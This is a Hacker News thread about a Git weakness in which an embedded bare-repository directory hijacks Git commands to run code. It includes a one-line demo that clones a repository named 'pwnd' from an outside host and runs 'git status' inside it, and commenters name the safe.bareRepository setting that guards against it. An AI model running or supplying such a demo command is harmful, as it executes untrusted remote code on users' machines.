Hacker News new | ask | show | jobs
by tomlx 1085 days ago
git does not clone hooks, but if a subdirectory of a repo has the structure of a bare repo it can hijack git subcommands for code execution. try:

  git clone https://git.0x90.space/vmann/pwnd && cd pwnd/whoot && git status
it is a bit crazy this is not disabled by default yet.
2 comments
darau1 1085 days ago
That's terrifying. I'll think twice before cloning any repository from now on.

> not disabled by default yet

You're saying there's a way to "disable" this behavior?

link
joeyh 1085 days ago
Set safe.bareRepository = explicit.
link
jwilk 1085 days ago
Available since Git v2.38:

https://github.com/git/git/commit/8d1a7448206e11cd

link
tomlx 1085 days ago
none that i know of
link
jdsalaro 1085 days ago
That's fascinating! Time to update my Blogpost on git hooks and go down this rabbit hole !
link